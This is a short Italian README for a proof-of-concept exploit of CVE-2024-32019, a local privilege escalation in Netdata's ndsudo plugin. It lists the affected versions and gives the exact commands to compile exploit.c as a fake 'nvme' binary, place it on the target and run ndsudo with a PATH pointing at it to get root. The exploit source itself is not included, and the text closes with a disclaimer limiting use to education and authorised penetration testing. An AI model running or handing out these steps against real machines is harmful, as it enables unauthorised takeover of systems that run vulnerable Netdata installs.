
Exploit proof-of-concept per CVE-2024-32019 che dimostra l'escalation dei privilegi locali tramite percorso di ricerca non attendibile nel plugin ndsudo di Netdata. Include istruzioni di compilazione e passaggi di distribuzione.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — escalation dei privilegi locale di ndsudo tramite percorso di ricerca non attendibile.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Trasferisci il binario compilato sulla macchina vulnerabile.
Rendilo eseguibile:
chmod +x nvme
Sfrutta il binario vulnerabile mediante manipolazione del PATH (usa lo stesso percorso in cui hai caricato il binario):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Questo codice Proof of Concept (PoC) è fornito solo per scopi educativi e di test di penetrazione autorizzati.